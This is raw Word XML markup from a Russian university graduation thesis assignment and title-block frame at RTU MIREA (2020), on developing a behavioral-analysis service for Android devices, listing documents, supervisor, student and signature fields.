              <w:t>Обоснование экономической эффективности решения</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25.11.2020</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>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Перечень разрабатываемых документов и графических материалов</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00583156" w:rsidRDefault="00583156" w:rsidP="00583156">
      <w:pPr>
        <w:pStyle w:val="120"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Пояснительная записка ВКР</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000853C0" w:rsidRDefault="00583156" w:rsidP="00583156">
      <w:pPr>
        <w:pStyle w:val="120"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Презентация</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00583156" w:rsidRDefault="00583156" w:rsidP="00583156">
      <w:pPr>
        <w:pStyle w:val="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="000853C0" w:rsidRDefault="000853C0" w:rsidP="00087A38">
      <w:pPr>
        <w:pStyle w:val="120"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:ind w:left="0" w:firstLine="709"/>
      </w:pPr>
      <w:r>
        <w:t>Руководитель выпускной квалификационной работы</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67"/>
        <w:gridCol w:w="2412"/>
        <w:gridCol w:w="2675"/>
        <w:gridCol w:w="2084"/>
      </w:tblGrid>
      <w:tr w:rsidR="00087A38" w:rsidTr="00087A38">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2548" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00087A38" w:rsidRDefault="00087A38" w:rsidP="00087A38">
            <w:pPr>
              <w:pStyle w:val="120"/>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>Функциональные обязанности</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2549" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00087A38" w:rsidRDefault="00087A38" w:rsidP="00087A38">
            <w:pPr>
              <w:pStyle w:val="120"/>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>Должность в Университете</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2841" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00087A38" w:rsidRDefault="00087A38" w:rsidP="00087A38">
            <w:pPr>
              <w:pStyle w:val="120"/>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>Фамилия, Имя, Отчество</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2257" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00087A38" w:rsidRDefault="00087A38" w:rsidP="00087A38">
            <w:pPr>
              <w:pStyle w:val="120"/>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>Подпись</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00087A38" w:rsidTr="00087A38">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2548" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00087A38" w:rsidRDefault="00087A38" w:rsidP="00087A38">
            <w:pPr>
              <w:pStyle w:val="120"/>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>Руководитель ВКР</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2549" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00087A38" w:rsidRDefault="00583156" w:rsidP="00087A38">
            <w:pPr>
              <w:pStyle w:val="120"/>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>к.т.н доцент</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2841" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00087A38" w:rsidRDefault="00583156" w:rsidP="00087A38">
            <w:pPr>
              <w:pStyle w:val="120"/>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="00583156">
              <w:t>Трубиенко Олег Владимирович</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2257" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00087A38" w:rsidRDefault="00087A38" w:rsidP="00087A38">
            <w:pPr>
              <w:pStyle w:val="120"/>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="0016468A" w:rsidRDefault="0016468A" w:rsidP="0016468A">
      <w:pPr>
        <w:pStyle w:val="120"/>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860"/>
      </w:tblGrid>
      <w:tr w:rsidR="00087A38" w:rsidTr="00087A38">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5097" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00087A38" w:rsidRDefault="00087A38" w:rsidP="0016468A">
            <w:pPr>
              <w:pStyle w:val="120"/>
              <w:ind w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t>Задание выдал</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5098" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00087A38" w:rsidRDefault="00087A38" w:rsidP="0016468A">
            <w:pPr>
              <w:pStyle w:val="120"/>
              <w:ind w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t>Задание принял к исполнению</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00087A38" w:rsidTr="00087A38">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5097" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00087A38" w:rsidRDefault="00087A38" w:rsidP="0016468A">
            <w:pPr>
              <w:pStyle w:val="120"/>
              <w:ind w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t>Руководитель ВКР: _____________________</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5098" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00087A38" w:rsidRDefault="00087A38" w:rsidP="0016468A">
            <w:pPr>
              <w:pStyle w:val="120"/>
              <w:ind w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t>Обучающийся: __________________________</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00087A38" w:rsidTr="00087A38">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5097" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00087A38" w:rsidRPr="00087A38" w:rsidRDefault="00087A38" w:rsidP="00087A38">
            <w:pPr>
              <w:pStyle w:val="120"/>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:vertAlign w:val="superscript"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:vertAlign w:val="superscript"/>
              </w:rPr>
              <w:t xml:space="preserve">                                                                           подпись</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5098" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00087A38" w:rsidRDefault="00087A38" w:rsidP="00087A38">
            <w:pPr>
              <w:pStyle w:val="120"/>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:vertAlign w:val="superscript"/>
              </w:rPr>
              <w:t xml:space="preserve">                                                                       подпись</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00087A38" w:rsidTr="00087A38">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5097" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00087A38" w:rsidRPr="00583156" w:rsidRDefault="00583156" w:rsidP="00583156">
            <w:pPr>
              <w:pStyle w:val="120"/>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>«_</w:t>
            </w:r>
            <w:r w:rsidRPr="00583156">
              <w:rPr>
                <w:u w:val="single"/>
              </w:rPr>
              <w:t>01</w:t>
            </w:r>
            <w:r w:rsidR="00087A38" w:rsidRPr="00583156">
              <w:t>_»   __</w:t>
            </w:r>
            <w:r w:rsidRPr="00583156">
              <w:rPr>
                <w:u w:val="single"/>
              </w:rPr>
              <w:t xml:space="preserve">      сентября</w:t>
            </w:r>
            <w:r>
              <w:t>____</w:t>
            </w:r>
            <w:r w:rsidR="00087A38" w:rsidRPr="00583156">
              <w:t>_ 2020 г.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5098" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00087A38" w:rsidRDefault="00583156" w:rsidP="00087A38">
            <w:pPr>
              <w:pStyle w:val="120"/>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:vertAlign w:val="superscript"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t>«_</w:t>
            </w:r>
            <w:r w:rsidRPr="00583156">
              <w:rPr>
                <w:u w:val="single"/>
              </w:rPr>
              <w:t>01</w:t>
            </w:r>
            <w:r w:rsidRPr="00583156">
              <w:t>_»   __</w:t>
            </w:r>
            <w:r w:rsidRPr="00583156">
              <w:rPr>
                <w:u w:val="single"/>
              </w:rPr>
              <w:t xml:space="preserve">      сентября</w:t>
            </w:r>
            <w:r>
              <w:t>____</w:t>
            </w:r>
            <w:r w:rsidRPr="00583156">
              <w:t>_ 2020 г.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00087A38" w:rsidRDefault="00087A38" w:rsidP="0016468A">
      <w:pPr>
        <w:pStyle w:val="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00D05E11" w:rsidRDefault="00D05E11">
      <w:pPr>
        <w:widowControl/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="851"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F870DF" w:rsidRDefault="00F870DF" w:rsidP="00F66289">
      <w:pPr>
        <w:pStyle w:val="11"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:left="709"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_Toc61019271"/>
      <w:bookmarkStart w:id="1" w:name="_Toc61019462"/>
      <w:bookmarkStart w:id="2" w:name="_Toc61030432"/>
      <w:bookmarkStart w:id="3" w:name="_Toc61030578"/>
      <w:bookmarkStart w:id="4" w:name="_Toc61459382"/>
      <w:r w:rsidRPr="00B113ED">
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <mc:AlternateContent>
          <mc:Choice Requires="wpg">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251659264" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" wp14:anchorId="3FF9B5EE" wp14:editId="69C5382F">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>714375</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="page">
                  <wp:posOffset>304800</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="6591300" cy="10118725"/>
                <wp:effectExtent l="19050" t="19050" r="19050" b="34925"/>
                <wp:wrapNone/>
                <wp:docPr id="42" name="Группа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1300" cy="10118725"/>
                          <a:chOff x="1134" y="397"/>
                          <a:chExt cx="10378" cy="16044"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="43" name="Text Box 6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1132"/>
                              </w:tblGrid>
                              <w:tr w:rsidR="00F870DF" w:rsidRPr="00333A82" w:rsidTr="00F870DF">
                                <w:trPr>
                                  <w:cantSplit/>
                                  <w:trHeight w:hRule="exact" w:val="284"/>
                                </w:trPr>
                                <w:tc>
                                  <w:tcPr>
                                    <w:tcW w:w="39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val="restart"/>
                                    <w:tcBorders>
                                      <w:top w:val="nil"/>
                                      <w:left w:val="nil"/>
                                      <w:bottom w:val="single" w:sz="18" w:space="0" w:color="auto"/>
                                      <w:right w:val="nil"/>
                                    </w:tcBorders>
                                    <w:vAlign w:val="center"/>
                                  </w:tcPr>
                                  <w:p w:rsidR="00F870DF" w:rsidRPr="00333A82" w:rsidRDefault="00F870DF" w:rsidP="00F870DF">
                                    <w:pPr>
                                      <w:jc w:val="center"/>
                                      <w:rPr>
                                        <w:sz w:val="17"/>
                                        <w:szCs w:val="17"/>
                                      </w:rPr>
                                    </w:pPr>
                                  </w:p>
                                </w:tc>
                              </w:tr>
                              <w:tr w:rsidR="00F870DF" w:rsidRPr="00333A82" w:rsidTr="00F870DF">
                                <w:trPr>
                                  <w:cantSplit/>
                                  <w:trHeight w:hRule="exact" w:val="284"/>
                                </w:trPr>
                                <w:tc>
                                  <w:tcPr>
                                    <w:tcW w:w="39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Изм.</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1304" w:type="dxa"/>
                                    <w:tcBorders>
                                      <w:top w:val="single" w:sz="18" w:space="0" w:color="auto"/>
                                      <w:left w:val="nil"/>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lang w:val="ru-RU"/>
                                      </w:rPr>
                                      <w:t>Ф.И.О.</w:t>
                                    </w:r>
                                  </w:p>
                                </w:tc>
                                <w:tc>
                                  <w:tcPr>
                                    <w:tcW w:w="851" w:type="dxa"/>
                                    <w:tcBorders>
                                      <w:top w:val="single" w:sz="18" w:space="0" w:color="auto"/>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Подпись</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Дата</w:t>
                                    </w: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Студент</w:t>
                                    </w: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Князев К.А.</w:t>
                                    </w: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val="restart"/>
                                    <w:tcBorders>
                                      <w:top w:val="nil"/>
                                      <w:left w:val="nil"/>
                                      <w:bottom w:val="single" w:sz="18" w:space="0" w:color="auto"/>
                                      <w:right w:val="single" w:sz="18" w:space="0" w:color="auto"/>
                                    </w:tcBorders>
                                    <w:vAlign w:val="center"/>
                                  </w:tcPr>
                                  <w:p w:rsidR="00F870DF" w:rsidRPr="00EC4887" w:rsidRDefault="00EC4887" w:rsidP="00F870DF">
                                    <w:pPr>
                                      <w:pStyle w:val="aff8"/>
                                      <w:jc w:val="center"/>
                                      <w:rPr>
                                        <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                                        <w:i w:val="0"/>
                                        <w:sz w:val="17"/>
                                        <w:szCs w:val="17"/>
                                        <w:lang w:val="ru-RU"/>
                                      </w:rPr>
                                    </w:pPr>
                                    <w:r w:rsidRPr="00EC4887">
                                      <w:rPr>
                                        <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                                        <w:i w:val="0"/>
                                        <w:sz w:val="17"/>
                                        <w:szCs w:val="17"/>
                                        <w:lang w:val="ru-RU"/>
                                      </w:rPr>
                                      <w:t>Разработка сервиса поведенческого анализа функционирования мобильных устройств на операционных системах андроид</w:t>
                                    </w:r>
                                  </w:p>
                                </w:tc>
                                <w:tc>
                                  <w:tcPr>
                                    <w:tcW w:w="852" w:type="dxa"/>
                                    <w:gridSpan w:val="3"/>
                                    <w:tcBorders>
                                      <w:top w:val="nil"/>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rPr>
                                      <w:t>Лит</w:t>
                                    </w:r>
                                    <w:r w:rsidRPr="00333A82">
                                      <w:rPr>
                                        <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                                        <w:i w:val="0"/>
                                        <w:sz w:val="17"/>
                                        <w:szCs w:val="17"/>
                                        <w:lang w:val="ru-RU"/>
                                      </w:rPr>
                                      <w:t>ера</w:t>
                                    </w:r>
                                  </w:p>
                                </w:tc>
                                <w:tc>
                                  <w:tcPr>
                                    <w:tcW w:w="851" w:type="dxa"/>
                                    <w:tcBorders>
                                      <w:top w:val="nil"/>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990" w:type="dxa"/>
                                    <w:tcBorders>
                                      <w:top w:val="nil"/>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Листов</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Руководит.</w:t>
                                    </w:r>
                                  </w:p>
                                </w:tc>
                                <w:tc>
                                  <w:tcPr>
                                    <w:tcW w:w="1304" w:type="dxa"/>
                                    <w:tcBorders>
                                      <w:left w:val="nil"/>
                                      <w:right w:val="nil"/>
                                    </w:tcBorders>
                                    <w:vAlign w:val="center"/>
                                  </w:tcPr>
                                  <w:p w:rsidR="00F870DF" w:rsidRPr="00333A82" w:rsidRDefault="00F870DF" w:rsidP="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left w:val="nil"/>
                                      <w:bottom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bottom w:val="single" w:sz="18" w:space="0" w:color="auto"/>
                                    </w:tcBorders>
                                    <w:vAlign w:val="center"/>
                                  </w:tcPr>
                                  <w:p w:rsidR="00F870DF" w:rsidRPr="00333A82" w:rsidRDefault="00F870DF" w:rsidP="00F870DF">
                                    <w:pPr>
                                      <w:pStyle w:val="aff8"/>
                                      <w:jc w:val="center"/>
                                      <w:rPr>
                                        <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                                        <w:i w:val="0"/>
                                        <w:sz w:val="17"/>
                                        <w:szCs w:val="17"/>
                                        <w:lang w:val="ru-RU"/>
                                      </w:rPr>
                                    </w:pPr>
                                  </w:p>
                                </w:tc>
                                <w:tc>
                                  <w:tcPr>
                                    <w:tcW w:w="284" w:type="dxa"/>
                                    <w:tcBorders>
                                      <w:bottom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p>
                                </w:tc>
                                <w:tc>
                                  <w:tcPr>
                                    <w:tcW w:w="990" w:type="dxa"/>
                                    <w:tcBorders>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Консульт.</w:t>
                                    </w:r>
                                  </w:p>
                                </w:tc>
                                <w:tc>
                                  <w:tcPr>
                                    <w:tcW w:w="1304" w:type="dxa"/>
                                    <w:tcBorders>
                                      <w:left w:val="nil"/>
                                      <w:right w:val="nil"/>
                                    </w:tcBorders>
                                    <w:vAlign w:val="center"/>
                                  </w:tcPr>
                                  <w:p w:rsidR="00F870DF" w:rsidRPr="00F870DF" w:rsidRDefault="00F870DF">
                                    <w:pPr>
                                      <w:pStyle w:val="aff8"/>
                                      <w:rPr>
                                        <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                                        <w:i w:val="0"/>
                                        <w:sz w:val="17"/>
                                        <w:szCs w:val="17"/>
                                        <w:lang w:val="ru-RU"/>
                                      </w:rPr>
                                    </w:pPr>
                                    <w:r>
                                      <w:rPr>
                                        <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                                        <w:i w:val="0"/>
                                        <w:sz w:val="17"/>
                                        <w:szCs w:val="17"/>
                                        <w:lang w:val="ru-RU"/>
                                      </w:rPr>
                                      <w:t>Потерпеев Г.Ю.</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val="restart"/>
                                    <w:tcBorders>
                                      <w:top w:val="single" w:sz="18" w:space="0" w:color="auto"/>
                                      <w:left w:val="nil"/>
                                      <w:right w:val="nil"/>
                                    </w:tcBorders>
                                    <w:vAlign w:val="center"/>
                                  </w:tcPr>
                                  <w:p w:rsidR="00F870DF" w:rsidRPr="00333A82" w:rsidRDefault="00F870DF">
                                    <w:pPr>
                                      <w:pStyle w:val="aff8"/>
                                      <w:jc w:val="center"/>
                                      <w:rPr>
                                        <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                                        <w:i w:val="0"/>
                                        <w:sz w:val="17"/>
                                        <w:szCs w:val="17"/>
                                        <w:lang w:val="ru-RU"/>
                                      </w:rPr>
                                    </w:pPr>
                                    <w:r>
                                      <w:rPr>
                                        <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                                        <w:i w:val="0"/>
                                        <w:sz w:val="17"/>
                                        <w:szCs w:val="17"/>
                                        <w:lang w:val="ru-RU"/>
                                      </w:rPr>
                                      <w:t>РТУ МИРЭА</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r w:rsidRPr="00333A82">
                                      <w:rPr>
                                        <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                                        <w:i w:val="0"/>
                                        <w:sz w:val="17"/>
                                        <w:szCs w:val="17"/>
                                      </w:rPr>
                                      <w:t>Н. Контр.</w:t>
                                    </w:r>
                                  </w:p>
                                </w:tc>
                                <w:tc>
                                  <w:tcPr>
                                    <w:tcW w:w="1304" w:type="dxa"/>
                                    <w:tcBorders>
                                      <w:left w:val="nil"/>
                                      <w:right w:val="nil"/>
                                    </w:tcBorders>
                                    <w:vAlign w:val="center"/>
                                  </w:tcPr>
                                  <w:p w:rsidR="00F870DF" w:rsidRPr="00D62566" w:rsidRDefault="00F870DF">
                                    <w:pPr>
                                      <w:pStyle w:val="aff8"/>
                                      <w:rPr>
                                        <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                                        <w:i w:val="0"/>
                                        <w:sz w:val="16"/>
                                        <w:szCs w:val="17"/>
                                        <w:lang w:val="ru-RU"/>
                                      </w:rPr>
                                    </w:pP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left w:val="nil"/>
                                      <w:bottom w:val="nil"/>
                                      <w:right w:val="single" w:sz="18" w:space="0" w:color="auto"/>
                                    </w:tcBorders>
                                    <w:vAlign w:val="center"/>
                                  </w:tcPr>
                                  <w:p w:rsidR="00F870DF" w:rsidRPr="00DA519E" w:rsidRDefault="00F870DF" w:rsidP="00F870DF">
                                    <w:pPr>
                                      <w:pStyle w:val="aff8"/>
                                      <w:rPr>
                                        <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                                        <w:i w:val="0"/>
                                        <w:sz w:val="16"/>
                                        <w:szCs w:val="17"/>
                                        <w:lang w:val="ru-RU"/>
                                      </w:rPr>
                                    </w:pPr>
                                    <w:r>
                                      <w:rPr>
                                        <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                                        <w:i w:val="0"/>
                                        <w:sz w:val="16"/>
                                        <w:szCs w:val="17"/>
                                        <w:lang w:val="ru-RU"/>
                                      </w:rPr>
                                      <w:t>З</w:t>
                                    </w:r>
                                    <w:r w:rsidRPr="00DA519E">
                                      <w:rPr>
                                        <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                                        <w:i w:val="0"/>
                                        <w:sz w:val="16"/>
                                        <w:szCs w:val="17"/>
                                        <w:lang w:val="ru-RU"/>
                                      </w:rPr>
                                      <w:t xml:space="preserve">ав. </w:t>
                                    </w:r>
                                    <w:r>
                                      <w:rPr>
                                        <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                                        <w:i w:val="0"/>
                                        <w:sz w:val="16"/>
                                        <w:szCs w:val="17"/>
                                        <w:lang w:val="ru-RU"/>
                                      </w:rPr>
                                      <w:t>к</w:t>
                                    </w:r>
                                    <w:r w:rsidRPr="00DA519E">
                                      <w:rPr>
                                        <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                                        <w:i w:val="0"/>
                                        <w:sz w:val="16"/>
                                        <w:szCs w:val="17"/>
                                        <w:lang w:val="ru-RU"/>
                                      </w:rPr>
                                      <w:t>аф.</w:t>
                                    </w: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r>
                            </w:tbl>
                            <w:p w:rsidR="00F870DF" w:rsidRPr="00333A82" w:rsidRDefault="00F870DF" w:rsidP="00F870DF">
                              <w:pPr>
                                <w:rPr>
                                  <w:sz w:val="17"/>
                                  <w:szCs w:val="17"/>
                                </w:rPr>
                              </w:pPr>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr rot="0" vert="horz" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" anchor="t" anchorCtr="0" upright="1">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="44" name="Line 6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6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 name="Line 6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7" name="Line 6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Line 6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F9B5EE" id="Группа 42" o:spid="_x0000_s1026" style="position:absolute;left:0;text-align:left;margin-left:56.25pt;margin-top:24pt;width:519pt;height:796.75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" o:allowincell="f">
                <v:shapetype id="_x0000_t202" coordsize="21600,21600" o:spt="202" path="m,l,21600r21600,l21600,xe">
                  <v:stroke joinstyle="miter"/>
                  <v:path gradientshapeok="t" o:connecttype="rect"/>
                </v:shapetype>
                <v:shape id="Text Box 6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" filled="f" stroked="f" strokeweight="2.25pt">
                  <v:textbox inset="0,0,0,0">
                    <w:txbxContent>
                      <w:tbl>
                        <w:tblPr>
                          <w:tblW w:w="1049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1132"/>
                        </w:tblGrid>
                        <w:tr w:rsidR="00F870DF" w:rsidRPr="00333A82" w:rsidTr="00F870DF">
                          <w:trPr>
                            <w:cantSplit/>
                            <w:trHeight w:hRule="exact" w:val="284"/>
                          </w:trPr>
                          <w:tc>
                            <w:tcPr>
                              <w:tcW w:w="39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val="restart"/>
                              <w:tcBorders>
                                <w:top w:val="nil"/>
                                <w:left w:val="nil"/>
                                <w:bottom w:val="single" w:sz="18" w:space="0" w:color="auto"/>
                                <w:right w:val="nil"/>
                              </w:tcBorders>
                              <w:vAlign w:val="center"/>
                            </w:tcPr>
                            <w:p w:rsidR="00F870DF" w:rsidRPr="00333A82" w:rsidRDefault="00F870DF" w:rsidP="00F870DF">
                              <w:pPr>
                                <w:jc w:val="center"/>
                                <w:rPr>
                                  <w:sz w:val="17"/>
                                  <w:szCs w:val="17"/>
                                </w:rPr>
                              </w:pPr>
                            </w:p>
                          </w:tc>
                        </w:tr>
                        <w:tr w:rsidR="00F870DF" w:rsidRPr="00333A82" w:rsidTr="00F870DF">
                          <w:trPr>
                            <w:cantSplit/>
                            <w:trHeight w:hRule="exact" w:val="284"/>
                          </w:trPr>
                          <w:tc>
                            <w:tcPr>
                              <w:tcW w:w="39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Изм.</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1304" w:type="dxa"/>
                              <w:tcBorders>
                                <w:top w:val="single" w:sz="18" w:space="0" w:color="auto"/>
                                <w:left w:val="nil"/>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lang w:val="ru-RU"/>
                                </w:rPr>
                                <w:t>Ф.И.О.</w:t>
                              </w:r>
                            </w:p>
                          </w:tc>
                          <w:tc>
                            <w:tcPr>
                              <w:tcW w:w="851" w:type="dxa"/>
                              <w:tcBorders>
                                <w:top w:val="single" w:sz="18" w:space="0" w:color="auto"/>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Подпись</w:t>
                              </w:r>
                            </w:p>
                          </w:tc>
                          <w:tc>
                            <w:tcPr>
                              <w:tcW w:w="567" w:type="dxa"/>
                              <w:tcBorders>
                                <w:top w:val="single" w:sz="18" w:space="0" w:color="auto"/>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Дата</w:t>
                              </w:r>
                            </w:p>
                          </w:tc>
                          <w:tc>
                            <w:tcPr>
                              <w:tcW w:w="6662" w:type="dxa"/>
                              <w:gridSpan w:val="6"/>
                              <w:vMerge/>
                              <w:tcBorders>
                                <w:left w:val="nil"/>
                                <w:bottom w:val="single" w:sz="18" w:space="0" w:color="auto"/>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Студент</w:t>
                              </w:r>
                            </w:p>
                          </w:tc>
                          <w:tc>
                            <w:tcPr>
                              <w:tcW w:w="1304" w:type="dxa"/>
                              <w:tcBorders>
                                <w:top w:val="nil"/>
                                <w:left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Князев К.А.</w:t>
                              </w:r>
                            </w:p>
                          </w:tc>
                          <w:tc>
                            <w:tcPr>
                              <w:tcW w:w="851" w:type="dxa"/>
                              <w:tcBorders>
                                <w:top w:val="nil"/>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top w:val="nil"/>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val="restart"/>
                              <w:tcBorders>
                                <w:top w:val="nil"/>
                                <w:left w:val="nil"/>
                                <w:bottom w:val="single" w:sz="18" w:space="0" w:color="auto"/>
                                <w:right w:val="single" w:sz="18" w:space="0" w:color="auto"/>
                              </w:tcBorders>
                              <w:vAlign w:val="center"/>
                            </w:tcPr>
                            <w:p w:rsidR="00F870DF" w:rsidRPr="00EC4887" w:rsidRDefault="00EC4887" w:rsidP="00F870DF">
                              <w:pPr>
                                <w:pStyle w:val="aff8"/>
                                <w:jc w:val="center"/>
                                <w:rPr>
                                  <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                                  <w:i w:val="0"/>
                                  <w:sz w:val="17"/>
                                  <w:szCs w:val="17"/>
                                  <w:lang w:val="ru-RU"/>
                                </w:rPr>
                              </w:pPr>
                              <w:r w:rsidRPr="00EC4887">
                                <w:rPr>
                                  <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                                  <w:i w:val="0"/>
                                  <w:sz w:val="17"/>
                                  <w:szCs w:val="17"/>
                                  <w:lang w:val="ru-RU"/>
                                </w:rPr>
                                <w:t>Разработка сервиса поведенческого анализа функционирования мобильных устройств на операционных системах андроид</w:t>
                              </w:r>
                            </w:p>
                          </w:tc>
                          <w:tc>
                            <w:tcPr>
                              <w:tcW w:w="852" w:type="dxa"/>
                              <w:gridSpan w:val="3"/>
                              <w:tcBorders>
                                <w:top w:val="nil"/>
                                <w:left w:val="nil"/>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r w:rsidRPr="00333A82">
                                <w:rPr>
